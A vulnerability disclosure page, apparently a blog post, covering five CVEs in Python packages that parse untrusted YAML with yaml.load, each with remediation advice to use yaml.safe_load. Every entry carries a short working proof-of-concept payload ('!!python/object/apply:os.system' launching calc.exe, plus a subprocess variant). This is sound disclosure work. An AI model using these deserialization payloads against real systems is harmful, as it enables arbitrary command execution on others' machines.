CVE-2017-16764: Vulnerability in Django_make_app

Python Package:  django_make_app

Version:      Before 0.1.3

Published:    Nov. 10 th. 2017

Reported by:       Joel

CVE-2017-16764    CVE_details

Overview

Django_make_app is Define models and fields using YAML and generate app for Django with views, forms, templates etc. An issue was discovered in the django_make_app package before 0.1.3.Untrusted data passed into the read_yaml_file function can execute arbitrary python commands resulting in command execution.

POC

1
2
3
from django_make_app.io_utils import read_yaml_file
yaml_raw_data = read_yaml_file('joel.yml')
#'joel.yml':!!python/object/apply:os.system ["calc.exe"]

Remediation

At present, manufacturers have not yet related repair patch. It should use yaml.safe_load to parse yaml file.

Cve-2017-16763: Configure Loaded Through Confire

Python Package:  confire

Version:      Before 0.2.0

Published:    Nov. 10th. 2017

Reported by:       Joel

CVE-2017-16763    CVE_details

Overview

Confire is a simple but powerful configuration scheme that builds on the configuration parsers of Scapy, elasticsearch, Django and others. Due to the user specific configuration was loaded from ~/.confire.yaml usinig yaml.load(), an issue was discovered in the Confire package before 0.2.0.Untrusted data passed into the confire.yaml files can execute arbitrary python commands resulting in command execution.

POC

1
2
3
4
5
6
7
8
9
10
11
12
class MyConfig(Configuration):
  mysetting = True
  logpath   = "/var/log/myapp.log"
  appname   = "MyApp"
settings = MyConfig.load()
#CONF_PATHS = [
#'/etc/confire.yaml',                    # The global configuration
#os.path.expanduser('~/.confire.yaml'),  # User specific configuration
#os.path.abspath('conf/confire.yaml')    # Local directory configuration
#    ]
#'~/.confire.yaml':!!python/object/apply:os.system ["calc.exe"]

Remediation

The updated versions of confire correctly use the yaml.safe_load method which prevents remote code execution.

CVE-2017-16615: Critical RESTful Web Applications Vulnerability

Python Package:  MLAlchemy

Version:      Before 0.2.2

Published:    Nov. 7th. 2017

Reported by:       Joel

CVE-2017-16615    CVE_details

Overview

MLAlchemy is a Python-based utility library aimed at allowing relatively safe conversion from YAML/JSON to SQLAlchemy read-only queries. One use case here is to allow RESTful web applications (written in Python) to receive YAML- or JSON-based queries for data, e.g. from a front-end JavaScript-based application. By exploiting vulnerability, attackers can execute arbitrary python commands resulting in command execution. Due to a wide range of involved, the vulnerability is extremely dangerous.

An issue was discovered in the MLAlchemy package before 0.2.2.Untrusted data passed into the parse_yaml_query() function can execute arbitrary python commands resulting in command execution.

POC

1
2
from mlalchemy import parse_yaml_query
parse_yaml_query('!!python/object/apply:os.system ["calc.exe"]')
Poc Video

Remediation

The updated versions of MLAlchemy (0.2.2) correctly use the yaml.safe_load method which prevents remote code execution.

CVE-2017-16618: Convert Through OwlMixin

Python Package:  OwlMixin

Version:      Before 2.0.0a12

Published:    Nov. 7th. 2017

Reported by:       Joel

CVE-2017-16618    CVE_details

Overview

OwlMixin is a Library which converts data class instance and others each other.Recently,an issue was discovered in the owlmixin package before 2.0.0a12.Untrusted data passed into the load_yaml() and the load_yamlf() functions can execute arbitrary python commands resulting in command execution.

POC

1
2
3
4
from owlmixin import util
util.load_yaml('!!python/object/apply:os.system ["calc.exe"]')
util.load_yamlf('joel.yml','utf-8')
#'joel.yml':!!python/object/apply:os.system ["calc.exe"]
Poc Video

Remediation

The updated versions of OwlMixin (2.0.0a12) correctly use the yaml.safe_load method which prevents remote code execution.

CVE-2017-16616: YAMLParser in PyAnyAPI

Python Package:  PyAnyAPI

Version:      Before 0.6.1

Published:    Nov. 7th. 2017

Reported by:       Joel

CVE-2017-16616    CVE_details

Overview

PyAnyAPI is a Library for for convenient interface creation over various types of data in a declarative way. An issue was discovered in the pyanapi package before 0.6.1.Untrusted data passed into the yaml.load() function can execute arbitrary python commands resulting in command execution.

POC

1
2
3
from pyanyapi import YAMLParser
YAMLParser({'test': 'container > test'}).parse('!!python/object/apply:os.system ["calc.exe"]').test
YAMLParser({'test': 'container > test'}).parse('!!python/object/new:subprocess.check_output [["calc.exe"]]').test
Poc Video

Remediation

The updated versions of PyAnyAPI (0.6.1) correctly use the yaml.safe_load method which prevents remote code execution.